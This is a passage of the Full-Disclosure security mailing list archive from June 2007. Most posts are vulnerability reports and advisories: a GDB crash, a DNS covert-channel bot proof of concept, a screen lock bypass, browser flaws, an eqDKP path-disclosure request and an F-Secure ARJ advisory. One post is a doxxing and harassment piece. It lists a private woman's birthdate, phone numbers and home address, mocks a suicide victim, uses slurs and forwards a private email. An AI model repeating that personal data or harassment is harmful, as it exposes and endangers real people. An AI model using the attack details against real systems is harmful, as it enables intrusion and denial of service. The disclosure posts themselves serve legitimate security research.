lastest CVS. **************************************************** ** Provided and/or discovered by : **************************************************** Discovered by KaiJern, Lau. (xwingssecuritynetmy) **************************************************** ** Changelog: **************************************************** 2007-06-02: Bug being published. **************************************************** ** Crashing GDB : **************************************************** $ file gdbupx gdbupx: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit, UPX compressed $ upx -d gdbupx Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: gdbupx: CantUnpackException: exe header corrupte.e Unpacked 0 files. $ gdb -v GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu". $ gdb gdbtest/bin/gdb GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... Using host libthread_db library "/lib/libthread_db.so.1". Really redefine built-in command "frame"? (y or n) [answered Y; input not from terminal] Really redefine built-in command "thread"? (y or n) [answered Y; input not from terminal] Really redefine built-in command "start"? (y or n) [answered Y; input not from terminal] gdb>r gdbupx GNU gdb 6.6.50.20070531-cvs Copyright (C) 2007 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... Program received signal SIGSEGV, Segmentation fault. _______________________________________________________________________________ eax:08334F70 ebx:00000000 ecx:08337168 edx:082C3240 eflags:00210246 esi:0833D320 edi:0833D34C esp:BF8E54D0 ebp:BF8E54F8 eip:0814CD82 cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s Z a P c [007B:BF8E54D0]---------------------------------------------------------[stack] BF8E5500 : 80 02 00 00 00 00 00 00 - FC 01 00 00 00 00 00 00 ................ BF8E54F0 : 30 00 00 00 F0 55 8E BF - 38 56 8E BF 50 D7 14 08 0....U..8V..P... BF8E54E0 : 68 71 33 08 F4 BD 2E 08 - F0 55 8E BF 00 00 00 00 hq3......U...... BF8E54D0 : 31 2D 25 08 FF FF FF FF - F8 54 8E BF 7D C0 14 08 1-%......T..}... [007B:0833D320]---------------------------------------------------------[ data] 0833D320 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0833D330 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ [0073:0814CD82]---------------------------------------------------------[ code] 0x814cd82 : movzx eax,BYTE PTR [ebx] 0x814cd85 : cmp al,BYTE PTR [edx+24] 0x814cd88 : mov BYTE PTR [esi+12],0x1 0x814cd8c : mov DWORD PTR [esp+12],ecx 0x814cd90 : sete al 0x814cd93 : movzx eax,al ------------------------------------------------------------------------------ 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482 1482 name = EXTERNAL_NAME (name, objfile->obfd); gdb>bt #0 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482 #1 0x0814d750 in coff_symfile_read (objfile=0x8337168, mainline=0x1) at coffread.c:1084 #2 0x08108ff3 in syms_from_objfile (objfile=0x8337168, addrs=0x833e280, offsets=0x0, num_offsets=0x0, mainline=0x1, verbo=0x0) at symfile.c:876 #3 0x081093de in symbol_file_add_with_addrs_or_offsets (abfd=0x8334f70, from_tty=0x0, addrs=0x0, offsets=0x0, num_offsets=0x0, mainline=0x1, flags=0x0) at symfile.c:988 #4 0x0810a265 in symbol_file_add_main_1 (args=0x8334f70 "\001", from_tty=0x82c3240, flags=) at symfile.c:1121 #5 0x08121b92 in catch_command_errors (command=0x810a3f0 , arg=0xbf8e72ad "../../gdbupx", from_tty=0x0, mask=0x6) at exceptions.c:530 #6 0x0807eb38 in captured_main (data=0xbf8e58f4) at .././gdb/main.c:728 #7 0x08121c2b in catch_errors (func=0x807e1e0 , func_args=0xbf8e58f4, errstring=0x8252d31 "", mask=0x6) at exceptions.c:515 #8 0x0807e193 in gdb_main (args=0xbf8e58f4) at .././gdb/main.c:881 #9 0x0807e155 in main (argc=0x0, argv=0x8332df0) at gdb.c:35 **************************************************** ** Thanks To : **************************************************** i. BSDaemon @ kernelhacking.com ii. RedDragon @ thc iii. Committee Members of hackinthebox.org iv. pulltheplug.org -- -- Regards, xWinGs aka KJ, Lau == All good things ... come by grace, and grace come by art, and art does not come easy. ** From : xwings (at) security (dot) net (dot) my From fosforo at gmail.com Sun Jun 3 16:59:31 2007 From: fosforo at gmail.com (=?UTF-8?Q?F=C3=A1bio_Martins_a.k.a_F=C3=B3sforo?=) Date: Sun, 3 Jun 2007 12:59:31 -0300 Subject: [Full-disclosure] FoFuS - PoC bot using DNS cover channel Message-ID: <6e285e810706030859t61d8f8fcgf846ba0020f26a1c@mail.gmail.com> I haven't seem a bot using dns covert channel, so i've tried to create one. client poorly written in assembly 32 bits and server poorly written in perl. given a list of public domains extracted from http://freedns.afraid.org/ the bot tries to contact his master and after a very simple challenge (xor/sub/add) the master can ask for system version, submit files, and code execution (maximum of 399 bytes) - with only dns packets. to test it, need to create a subdomain at freedns.afraid and a machine listening on port 53 to where the server answer requests. http://fosforo.sytes.net/FoFuS_PoC_bot_beta2.tar.gz []s -- ---------------------------------------------------------------------------- F?sforo Blog: http://insanenetworks.blogspot.com ---------------------------------------------------------------------------- Bcz sex is like hacking.. you get in, you get out, and you hope you didn't leave something behind that can be traced back to you.. ---------------------------------------------------------------------------- From lolcommawhat at googlemail.com Sun Jun 3 22:20:18 2007 From: lolcommawhat at googlemail.com (Joseph Evers) Date: Sun, 3 Jun 2007 17:20:18 -0400 Subject: [Full-disclosure] apryl maynard, internet humanitarian Message-ID: <9178da530706031420h324960b9w2f69b047c6473d33@mail.gmail.com> Now this is a story all about how Apryl's life got flipped, turned upside down and I'd like to take a minute to tell you a tale of how this fat lesbian WEB DESIGNER failed Wetwork: Apryl Maynard, daughter of Robin and John (deceased) birthday: april 12, 1979 lj: wetwork.livejournal.com myspace: myspace.com/cloudmerchant her phone numbers: (905) 347-2005 (primary #) (905) 680-1532 Address: 221 Mary Street Thorold, Ontario L2V1J7 Canadia ex-girlfriend darci: myspace.com/pixiestikgirl The story, briefly, is as follows: A 20-year old girl, Krystle Lynn Babin, known on livejournal as sad_little_scar and miss_aveline, committed suicide on September 27th 2006. In the spring of 2007 this was mentioned by one of the deceased's acquaintances on the journal of lj user get_therapy. As several EDiots seem to hang around said troll journal, a typical Encyclopedia Dramatica article was soon written mocking the deceased, in particular her disturbing publicly-posted nudes, which included bondage and in-use tampons. Several people including lj users wetwork and medeanyxgray became irate and began pulling rudimentary personal info and cursing about the great evil which the internet had wrought, while demonstrating their moral superiority by seeking out Krystle's parents and showing them the article. Wetwork was suspended temporarily from lj for the well-thought-out act of posting this info publicly on a website which explicitly forbids it. Wetwork repeatedly complained to and threatened Encyclopedia Dramatica and the author of the article, and eventually orchestrated a DDoS attack, forcing the article to be removed. Proof of responsibility for some type of prank directed against her became a requirement for speaking on the ED IRC channel. Her website was soon "down for repairs" indefinitely, and many of her recent posts make angst-ridden references to having lost friends and to "something very strange" going on. Her threats of "utter ruin" have so far proven to be entirely empty, unless they were meant to be threatening to ruin her own life. The following emails between her and a furry known as Leam, among many others equally threatening on her part, ensued. Starting with the most recent: Apryl, I just saw the Arbchat logs and I don't know what to say. I was actually trying to work with one of the "nice" sysops (who was present) there to at least get some of the contact info removed... and then you threatened the wolves in their den. There isn't a thing that can be done /now/ to reduce the amount of information in the article for 6 months, at least (until they forget about the article). You also, for whatever reason, appeared to coordinate a DDoS attack on colo4dallas? "04:15:12 PM OVERLOAD: I'll contact colo4dallas again and let them know we have no co-operation from you 04:16:19 PM OVERLOAD: ok we're gonna play a little game 04:17:05 PM OVERLOAD: gonna msg a few people as well who want this page gone 04:17:16 PM OVERLOAD: you will see 04:18:35 PM OVERLOAD: yah go connect to your page now assholes. we'll see how long colo4dallas puts up with this b4 they term your ass and u can have fun finding another provider 04:19:16 PM OVERLOAD: we'll see whos a fag when you have no provider 04:19:23 PM OVERLOAD: and colo4dallas terms your asses 04:19:30 PM OVERLOAD: u think its a joke now but you'll see 04:19:57 PM OVERLOAD: lol goto efnet bitches plenty of kiddies on there to play with your site 04:20:12 PM OVERLOAD: you shit is done, remove the page or it can stay down 04:20:49 PM OVERLOAD: have fun newbs, colo4dallas will be contact again and we'll see how happy they are about your site being the cause of their outtages 04:20:57 PM OVERLOAD: im sure other customers will be quite happy too 04:21:33 PM OVERLOAD: have fun newbs im out, but last warning remove shit or your site can stay down" Why didn't you listen? Why did you charge in, guns blazing? What did you have to gain by doing so? I was right about everything in regards to international law, copyright, and now you're trying to get an international hosting account suspended without going through the normal ToS channels AND threatening them AND launching or at least coordinating a denial-of-service attack? That causes real damage to sites other than ED, and you need to remember that. But I suppose like with everything else, you'll learn the hard way. I sincerely hope that the crimes you committed aren't felonious. Please, reconsider your threats and make amends, before this spirals too far out of control. WETWORK SAYS: i want to reiterate what i've been saying this whole time: all i did was find this kid's information and pass it along to miss_aveline's parents. do you understand that? if shit is happening to [name alert], that's his problem. and the information i found was available on google. anyone could have found it. i am not responsible for any of the things you guys seem to think i'm doing. period. i have a life that is a little bit too full to have time for shit like this. and i can't make anything stop [note: she was never asked to make anything stop] because i don't know who's doing it. i don't have any way to contact any of these people -- they are angry friends of a dead girl that you guys are making fun of.. i can't control that. the only person who can is [name alert]. take down the article and everything stops. that's all i can suggest. and, for the record? i didn't even know the girl. i am very sorry she died but it's not going to upset me to hear voicemail directed to a dead girl. i got involved because i know someone who knew her and that's all there is to it. i sent brendan's information to the parents of the girl he's mocking and that was it. now ask yourself: if i didn't know miss_aveline, never met her in my life, why would i be wasting my time causing all these problems for some kid in [location alert]? it doesn't make a whole lot of sense, does it? that's probably because i'm not doing anything to him. and i don't know who is. but you know, i don't feel sorry for him. or his crazy friends. if he has sociopathic tendencies, he needs help. and everything i've seen of him so far screams sociopath. why are you even friends with him? you seem like a reasonable sort. i'm totally bewildered by this. again, i urge you to remove yourself from the situation. when someone bumps me, i bump back, and you guys don't know who you're dealing with. doesn't that seem a little worrisome? the repercussions of his actions may not be immediately obvious but brendan is in for a world of trouble in the very near future. [note: no world of trouble has actually materialized.] and no, that is not a physical threat. i'm 5'6" and haven't been in a fight since fifth grade. LEAM: Apryl, it isn't about Jazzriff now, or even about Miss_aveline; it's been well-established that there isn't any legal recourse against Jazzriff, and the article was already removed. Nothing has happened or is happening to him. This is about what you have done to Encyclopedia Dramatica, now. >From your tone, I can tell that was you in Arbchat, and your connection information will no doubt confirm it. You set off a denial-of-service attack on Dreamhost and outright admitted to it. Please don't insult my intelligence by trying to deny it now. To use a gun metaphor, you can't say you're not responsible for where a bullet goes when you pulled the trigger, when you declared your intent and aim. Do you see the hypocricy in calling Jazzriff a sociopath when you are so clearly willing to do the exact same thing? My only involvement in the situation has been to try and get it resolved amicably (my purpose on ED) and to defend my friend; the difference between us is that I am a pacifist. However, all my efforts were clearly in vain. But the matter of your threats against me and even against Jazzriff are really moot, now. WETWORK: i have no idea what a arbchat is -- do you understand that? and i have absolutely no knowledge of how to 'attack' such a thing. the conversation you sent me was grammatically incorrect and full of misspellings. does that really sound like me? bullshit. not even remotely possible. the thing is, a sociopath has issues realizing that there are people around him or her; he/she considers himself/herself to be the only real consciousness on the planet and the rest of the population are bit-players in his/her little play. a sociopath hurts people for his/her own entertainment. who would hurt by removing the article? who would cry over the loss of that horrid piece of trash? calling me a sociopath is laughable. my roommate was involved with miss_aveline for nearly four years. they lived together, shared a bed and made plans for their future. when they broke up, my roommate was utterly destroyed. a few months later, miss_aveline was dead by her own hand. the girl just snapped, broke into pieces and killed herself and it's absolutely impossible to get over that kind of loss. i adore my roommate. she is the nicest, sweetest, kindest person i've ever met in my life. she doesn't deserve this. only someone with real issues would hurt a girl who has never hurt anyone in her life. only someone with psychological problems would want to cause pain to a girl who refuses to even utter the word 'hate' because she thinks it's too strong a term. my roommate is being hurt and because i care about her, i will fight to get that piece of trash taken down. i will call in every favor i am owed and again: you do not know who you are messing with or who owes me favors. the article was not removed. it disappears and returns. until i get a formal letter from [name alert] stating the article will be removed and never reposted anywhere on the internet, i will continue my efforts to have it removed. until brendan himself assures me that he will leave miss_aveline's memory alone, i will pursue his utter ruin in every way i know how. but you need to understand (and pass it along to [name alert]'s stupid kindergarten friends) that i am not responsible for anything that has happened thus far. i'm working on a few things but nothing has had any direct effect on [name alert]'s life. whatever he thinks i'm doing, i'm not -- he hasn't seen what i'm up to because what i'm doing takes time. i got a ridiculously funny call today, by the way. some guy said he got my number off craigslist and called to see if i was still interested in 'a firm hand' as he put it. i'm telling you, i laughed so hard after the call that my friend wanted to perform CPR. so thanks to whoever did that -- it really, really brightened my day. you take care quotes from ED IRC: 04:15:12 PM OVERLOAD: I'll contact colo4dallas again and let them know we have no co-operation from you 04:16:19 PM OVERLOAD: ok we're gonna play a little game 04:17:05 PM OVERLOAD: gonna msg a few people as well who want this page gone 04:17:16 PM OVERLOAD: you will see 04:18:35 PM OVERLOAD: yah go connect to your page now assholes. we'll see how long colo4dallas puts up with this b4 they term your ass and u can have fun finding another provider 04:19:30 PM OVERLOAD: u think its a joke now but you'll see 04:19:57 PM OVERLOAD: lol goto efnet bitches plenty of kiddies on there to play with your site 04:20:12 PM OVERLOAD: you shit is done, remove the page or it can stay down 04:20:49 PM OVERLOAD: have fun newbs, colo4dallas will be contact again and we'll see how happy they are about your site being the cause of their outtages 04:20:57 PM OVERLOAD: im sure other customers will be quite happy too 04:21:33 PM OVERLOAD: have fun newbs im out, but last warning remove shit or your site can stay down The following message was sent to Apryl Maynard through the intervention of some deeply caring individual. ---------- Forwarded message ---------- From: John Smid, jjsmid at loveinaction.org Date: Mar 21, 2007 10:18 AM Subject: Thank you for writing us To:silverflux.design at gmail.com Apryl, I can certainly understand your struggle, Apryl. I have gone through this myself as a man and have found God's resolution to work the best and bring the greatest rewards. You mentioned that you have "tried" to be with men and have found it not to work. May I bring some perspective to this as I have heard many who have said the same thing that you have. A women [sic] need security, right? She needs safety, right? Well, think about this, you have attempted to engage in one of the most intimate things a human being can do, sexual intimacy. This is one of the most vulnerable and unsafe things we can do because of that deep vulnerability that we experience in a sexual encounter with someone. Anytime sex is experienced outside of a committed, trusting, safe marriage there is always the insecurity that the relationship will not last, the person will go with someone else, we are just being used for personal gratification etc. Many people who have struggled with same sex attractions have attempted to solve it by seeing if they can have a successful sexual experience with someone of the opposite sex and in almost every case, the test comes out negative. I truly believe that it is because the "experiment" is just that, using another person's vulnerability to see if I can "do it". This will always end up with a failure due to disappointment, rejection, or just a distaste for what had just occurred. In order for you to really experience the freedom from homosexuality that you are speaking of it takes first of all s surrender to Jesus Christ that abandons all that you are to His word of Truth.  Any sex outside of marriage is unbiblical and will end up with damage ? in every case! This means that regardless of our attractions unless we are married we are called to live a celibate life and find God's grace and joy in that. Secondly, God gives no positive words to us about same sex marriage or relationship. There is nothing in Scripture that alludes to homosexuality being something that He blesses. So marriage means a committed relationship with someone of the opposite sex. Did God make us gay? NO! Sin made us struggle with same sex attractions. The sin of Adam and of those on down the line from him have damaged our world. Our sin continues that in other's lives. We are born into a broken world with all of the effects of sin in our lives and our relationships. God gave us an answer, a resolution, a freedom through the death and resurrection of Jesus Christ. His love and mercy offers us forgiveness and restoration from the sin of Adam which brings us into eternity with Him. Many say God doesn't make any junk. There is a truth to that but it doesn't take into consideration the brokenness that we all experience. Are we junk? Certainly not. But we do live in a world that is damaged and at times pretty junky. I have found, Apryl, that when I surrendered my life to Jesus I first of all had answers for the problems that I was encountering. I also found that there was an altar of forgiveness that I could run to when I failed at something. Jesus began to show me that I had a purpose and that He could use my life for His glory. I had talents and gifts that were of value and this went a long way to helping me find a life that was better. God wants to show us a life that is worthy of His calling and that is my prayer for you ? that you will find a life that is worthy of His calling. I pray that you will see that there is so much more of you than same sex attraction. I find men attractive (some men that is). I also make decisions to see them as God sees them. I choose not to see them as objects to gratify my unhealthy desires. I have found men that I really care about and that care about me without compromise and unhealthy things coming into the relationship. This has been so much more rewarding for me than the way that I used to live. I choose not to go back to where I was. Single or married, God's grace is sufficient. Trying out sex to see if it works is taking our lives into our own hands. t is an attempt to control the outcome without seeking God for His provision. Apryl, I hope this gives you some things to think about. Go to this website to find the ministry that might be closest to you in Canada: http://www.exodus.to I love the Lord for He hears my voice. Ps. 116 Rev. John J. Smid President and CEO Love In Action Int'l. Inc. 4780 Yale Rd., Memphis, TN 38128 Phone: 901-751-2468 www.loveinaction.org In response to my personal two-sentence inquiry as to why she attacked ED and provoked Bantown, I received this bizarre work of fiction: Mr. Evers, Please feel free to assume I made an attack on "Bantown" since that's clearly the popular theory. However, I assure you I have no idea what a Bantown is, where it is, what it's for and how to locate such a thing. I would also be at a loss if asked to describe this attack. I play with Photoshop and write basic HTML for a living -- this does not make me knowledgeable when it comes to attacking things. I have been set up to take the fall for this attack because I disagreed with someone and am now suffering for being honest about my name, telephone number and location. I suspect the individual responsible for what happened is someone that's very annoyed with me or close friends with an acquaintance but I have no idea how to locate this person in order to offer him or her up for sacrifice. If I come by that contact information, please be assured you'll be the first to know. In the meantime, I'm not living at the address posted to my domain registration information, none of the phone calls have bothered me and I am not currently surrounded by ten thousand boxes of aluminum nails. To sum up, none of the efforts made thus far are having much of an effect and I would like to politely request that you rethink the situation before making more mischief for me. Of course, you'll ignore that request. But you and the rest of your legion have yourself a lovely evening. Sincerely, Apryl Maynard -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070603/736ea67a/attachment.html From rembrandt at jpberlin.de Mon Jun 4 04:36:31 2007 From: rembrandt at jpberlin.de (rembrandt at jpberlin.de) Date: Mon, 4 Jun 2007 05:36:31 +0200 (CEST) Subject: [Full-disclosure] screen 4.0.3 local Authentication Bypass Message-ID: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de> Please take a look at the Attachement dear List moderator. :) Kind regards, Rembrandt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: screen_4.0.3_authentication_bypass_0815.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/45e80874/attachment.txt From kefka at kevinbeardsucks.com Mon Jun 4 05:56:45 2007 From: kefka at kevinbeardsucks.com (kefka) Date: Mon, 04 Jun 2007 00:56:45 -0400 Subject: [Full-disclosure] Full Path Disclosure eqDKP 1.3.2c and prior In-Reply-To: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de> References: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de> Message-ID: <46639B8D.1010503@kevinbeardsucks.com> eqDKP 1.3.2c and prior 'compare' variable reveals the full path because eqdkp fails to properly sanitize user-supplied input Example: /path-to-eqdkp/listmembers.php?compare=%00 From jim.geovedi at gmail.com Mon Jun 4 08:17:00 2007 From: jim.geovedi at gmail.com (Jim Geovedi) Date: Mon, 4 Jun 2007 14:17:00 +0700 Subject: [Full-disclosure] BCS'07 Call For Papers Message-ID: <87d5db160706040017v26ac48dg1f8c6d411d81bd23@mail.gmail.com> Dear Full Disclosure readers, The call for papers and conference registration is now open for BCS'07, our third annual information security & hacking conference. > From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia > in Jakarta, Indonesia. We invite proposals for paper presentations and demonstrations: Your submission should include: 1. Name, title, address, email and phone number 2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote format), proof of concept for tools and exploits, etc. 3. Short biography, qualification, occupation, achievement and affiliations (limit 150 words). 4. Summary or abstract for your presentation (limit 150 words) 5. Time (40-60 minutes). Include time for discussion and questions 6. Technical requirements (video, internet, wireless, audio, etc.) We do not accept product, service or vendor related presentations. Please send your proposal to bcs07-cfp at bellua.com as soon as possible and no later than 30 June 2007. Proposals will be evaluated in the order received; submit early to maximise your chances of being selected. Links: http://www.bellua.net or http://www.bellua.com/bcs/ Pictures from BCS2006: http://www.bellua.net/asia06.pictures/index.html Pictures from BCS2005: http://www.bellua.net/asia05.pictures/index.html Many thanks, Jim Geovedi From zeroknock at metaeye.org Tue Jun 5 20:36:31 2007 From: zeroknock at metaeye.org (Aditya K Sood) Date: Tue, 05 Jun 2007 12:36:31 -0700 Subject: [Full-disclosure] Adverse Vectors of Coding in Wordpress : Post Modifications Message-ID: <4665BB3F.8000800@metaeye.org> Hi all This analysis directly or indirectly revolves around the coding of wordpress.In this the stress is being laid on the modification of .php pages present in the wordpress.This issues comes relevant when the user changes some of the content of base pages to render it according to its own needs. you can find it at : http://cera.metaeye.org/wpana.xhtml http://zeroknock.blogspot.com/2007/06/adverse-vectors-of-coding-in-wordpress.html Regards Aditya K Sood Zerkn0ck http://www.metaeye.org From a.klink at cynops.de Mon Jun 4 09:14:58 2007 From: a.klink at cynops.de (Alexander Klink) Date: Mon, 4 Jun 2007 10:14:58 +0200 Subject: [Full-disclosure] screen 4.0.3 local Authentication Bypass In-Reply-To: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de> References: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de> Message-ID: <20070604.813591b8d65e87287fd5e77cca351e62@cynops.de> Hi, On Mon, Jun 04, 2007 at 05:36:31AM +0200, rembrandt at jpberlin.de wrote: > It has been tested on OpenBSD 4.1 + screen 4.0.3 on x86. > > How to reproduce: > > Lock screen using ctrl+x I guess you mean Ctrl+a+x? > Choose a Password > Confirm the Password > > Screen asks for a Password to unlock the screen. > Just press ctrl+c and it displays "Getpass error". > 2 seconds later the screen is unlocked and you`ve access. I can't reproduce this on either Mac OS X (screen 4.00.03) or Debian (screen 4.00.02) ... Regards, Alex From zeroknock at metaeye.org Tue Jun 5 20:33:48 2007 From: zeroknock at metaeye.org (Aditya K Sood) Date: Tue, 05 Jun 2007 12:33:48 -0700 Subject: [Full-disclosure] Project CERA : Cutting Edge Research Arena Message-ID: <4665BA9C.4080408@metaeye.org> Hi all Project CERA : Cutting Edge Research Arena is undertaken. The project provides detailed analysis of untamed issues related to Web exploitation , Web penetration and Web security. Due to its wide acceptance it is projected as prime base. http://cera.metaeye.org Regards Aditya K Sood Zeroknock http://www.metaeye.org From lcamtuf at dione.ids.pl Mon Jun 4 12:02:40 2007 From: lcamtuf at dione.ids.pl (Michal Zalewski) Date: Mon, 4 Jun 2007 13:02:40 +0200 (CEST) Subject: [Full-disclosure] Assorted browser vulnerabilities Message-ID: Hello, Will keep it brief. A couple of browser bugs, fresh from the oven, hand crafted with love: 1) Title : MSIE page update race condition (CRITICAL) Impact : cookie stealing / setting, page hijacking, memory corruption Demo : http://lcamtuf.coredump.cx/ierace/ ...aka the bait & switch vulnerability. When Javascript code instructs MSIE6/7 to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page, for example: - Read or set victim.document.cookie, - Arbitrarily alter document DOM, including changing form submission URLs, injecting code, - Read or write DOM structures that were not fully initialized, prompting memory corruption and browser crash. This is tested on MSIE6 and MSIE7, fully patched. 2) Title : Firefox Cross-site IFRAME hijacking (MAJOR) Impact : keyboard snooping, content spoofing, etc Demo : http://lcamtuf.coredump.cx/ifsnatch/ Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30] Javascript can be used to inject malicious code, including key-snooping event handlers, on pages that rely on IFRAMEs to display contents or store state data / communicate with the server. This is related to a less severe variant independently reported by Ronen Zilberman two weeks earlier (bug 381300). 3) Title : Firefox file prompt delay bypass (MEDIUM) Impact : non-consentual download or execution of files Demo : http://lcamtuf.coredump.cx/ffclick2/ Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04] A sequence of blur/focus operations can be used to bypass delay timers implemented on certain Firefox confirmation dialogs, possibly enabling the attacker to download or run files without user's knowledge or consent. 3) Title : MSIE6 URL bar spoofing (MEDIUM) Impact : mimicking an arbitrary site, possibly including SSL data Demo : http://lcamtuf.coredump.cx/ietrap2/ MSIE6 vulnerability, similar but unrelated to my earlier onUnload entrapment flaw, allows sites to spoof URL bar data. MSIE7 is not affected because of certain high-level changes in the browser. From advisories at portcullis-security.com Mon Jun 4 11:49:35 2007 From: advisories at portcullis-security.com (advisories) Date: Mon, 4 Jun 2007 11:49:35 +0100 Subject: [Full-disclosure] Portcullis Computer Security Ltd - Advisories Message-ID: <78FA4E96C9E69341989E9416E06225DB010408D2@tgbex.otl.portcullis-security.com> Hello Please find attached the above advisories from Portcullis Computer Security Ltd. Kind Regards Tracey Parry Advisories Portcullis Computer Security Ltd ############################################################### This email originates from the systems of Portcullis Computer Security Limited, a Private limited company, registered in England in accordance with the Companies Act under number 02763799. The registered office address of Portcullis Computer Security Limited is: The Grange Barn, Pikes End, Pinner, MIDDX, United Kingdom, HA5 2EX. The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Any opinions expressed are those of the individual and do not represent the opinion of the organisation. Access to this email by persons other than the intended recipient is strictly prohibited. If you are not the intended recipient, any disclosure, copying, distribution or other action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email is subject to the terms and conditions expressed in the applicable Portcullis Computer Security Limited terms of business. ############################################################### ##################################################################################### This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal. ##################################################################################### -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment.html -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtusernameenumeration - 06-038.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtcookie - 06_033.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0001.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtdirectory - 06_034.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0002.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtinjection - 06_035.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0003.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtphishing - 06_36.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0004.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: mtupload - 06_037.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/d7f3033c/attachment-0005.txt From security at nruns.com Mon Jun 4 17:52:21 2007 From: security at nruns.com (security at nruns.com) Date: Mon, 4 Jun 2007 18:52:21 +0200 Subject: [Full-disclosure] n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory Message-ID: n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.014 04-Jun-2007 ________________________________________________________________________ Vendor: F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 7.00 and earlier F-Secure Anti-Virus for Windows Servers version 7.00 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 7.00 and earlier F-Secure Anti-Virus for MS Exchange version 7.00 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier F-Secure Anti-Virus for Linux Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.52 and earlier F-Secure Anti-Virus Linux Server Security 5.52 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Infinite Loop DoS (remote) Risk: HIGH ________________________________________________________________________ Vendor communication: 2007/05/07 initial notification to F-Secure Corporation 2007/05/08 F-Secure Corporation Response 2007/05/08 PGP public keys exchange 2007/05/08 PoC files sent to F-Secure Corporation 2007/05/14 F-Secure Corporation acknowledged the PoC files 2007/05/18 F-Secure Corporation validate the Vulnerability 2007/05/18 F-Secure Corporation notify update release date 2007/05/30 F-Secure Corporation released Update with fixes ________________________________________________________________________ Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. In detail, the following flaw was determined: - Infinite Loop in .ARJ files parsing Impact: This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 